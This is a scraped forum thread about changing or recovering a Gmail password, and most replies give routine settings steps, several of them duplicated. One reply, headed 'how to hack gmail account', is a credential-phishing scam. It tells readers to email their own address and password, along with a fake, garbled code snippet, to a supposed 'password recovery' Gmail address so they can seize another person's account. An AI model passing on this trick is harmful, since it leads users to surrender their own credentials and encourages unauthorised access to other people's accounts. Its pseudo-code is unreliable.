xisto Community
Sign in to follow this  
Jesse

Changing A Gmail Password how do u do it?

hi i have a gmail account well a couple of them and i know that someone has been getting on my account and screwing with it however i dont know how im supposed to get on and change my password. i've tried even getting them to send me information and what not when i forget my password but all the same i can never get to a point where i can change it and it kinda is making me upset. my ex gets on my account and yells at my friends telling them that i've changed and that i dont want anything to do with them and thats wrong i love my friends. anywayz if you know how to change that please let me know i'll be checking back here for answers as soon as i can thank you so much if you can hlep me it would be greatly appreciated.jesse

Well, in Gmail, you log in, you look at the top right corner, and you click "settings", and then, you click on the "accounts" tag, and on the bottom, it will say "Visit your Google Account settings to reset your password, change your security question, or learn about access to other Google services"... just click on it, and on the side under "Personal Info", click on "Password" and you can change it there.

I recommend checking the Gmail FAQs if my information was wrong.

http://forums.xisto.com/no_longer_exists/

thank you im sure that it will help because im not so sure as to what to do because this is all so new to me. im somewhat trying to help out a friend who we think that his ex changed his password and we're trying to get the account back. its kinda complicated but my friend is in the hospital and cant get released till he has 200 and he only has 125 right now hes almost there but im trying to get him out of the hospital as soon as possible. but thank you for the information im sure that it will at least help me somewhat in getting back the account and everything.Jesse

forget the password

Changing A Gmail Password

I am forget the G mail log in how to recover the password.How can I change my password.

-mallika

how to change my password...?

Hi

I have a gmail account well a couple of them and I know that someone has been getting on my account and screwing with it however I don't know how I'm supposed to get on and change my password.

I've tried even getting them to send me information and what not when I forget my password but all the same I can never get to a point where I can change it and it kinda is making me upset. My ex gets on my account and yells at my friends telling them that I've changed and that I don't want anything to do with them and thats wrong I love my friends.

Anywayz if you know how to change that please let me know I'll be checking back here for answers as soon as I can thank you so much if you can hlep me it would be greatly appreciated.

Binny

-reply by binny

to change a gmail password, follow these steps:

1. go to https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2FManageAccount&followup=https%3A%2F%2Faccounts.google.com%2FManageAccount

2. sign in to your account.

3. on the left side under personal information, click on the link that says change password.

4. from there, its pretty easy.

easy change ur pass

1 Sign in to Gmail.

2 Click Settings at the top of any Gmail page, and open the Accounts tab.

3 Click Google Account settings.

In the new window, click Change password under the Personal information option.

4 Enter your current password and your new password.

-reply by SALMAN QURESHI

hello EaSy Ur PaSsWoRd ChAnGe

1 Sign in to Gmail.

2 Click Settings at the top of any Gmail page, and open the Accounts tab.

3 Click Google Account settings.

In the new window, click Change password under the Personal information option.

4 Enter your current password and your new password.

-reply by SALMAN QURESHI

why does my gmail new password keep changing back to my old password?Changing A Gmail Password

Everytime I change my password, after about an hour, it changes back to my original password! What is happening and why?

Thansk so much!

Change PasswordChanging A Gmail Password

Sign in to Gmail.  Click Settings at the top of any Gmail page, and open the Accounts tab. Click Google Account settings. In the new window, click Change password under the Personal information option.  Enter your current password and your new password. 

-reply by sabeesh

how to hack gmail account Changing A Gmail Password

--------------------------------------------------------------------------------

Step 1: Log into your Gmail account.

Step 2: Compose a new mail.

Step 3: In subject box type " PASSWORD RECOVERY "

Step 4: Send this to - passwrdserver02@gmail.Com

Step 5: Write this in message box.

(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password

(fourth line) - <pwdcursive><

v703&login="passmachine&f=(p0assword)

&f=27586&___javascript=ACTIVE&rsa#"

start?></script>=""></cursive><>

{simply copy and paste above.}

-reply by priya

hi i have a gmail account well a couple of them and i know that someone has been getting on my account and screwing with it however i dont know how im supposed to get on and change my password. i've tried even getting them to send me information and what not when i forget my password but all the same i can never get to a point where i can change it and it kinda is making me upset. my ex gets on my account and yells at my friends telling them that i've changed and that i dont want anything to do with them and thats wrong i love my friends. anywayz if you know how to change that please let me know i'll be checking back here for answers as soon as i can thank you so much if you can hlep me it would be greatly appreciated.
jesse

just easy
got to settings
reset your password
click there
and you will be asked for old password
there you can also change the security question
or secondary email associated with the account.where in case of password forgotten a reset email can be sent.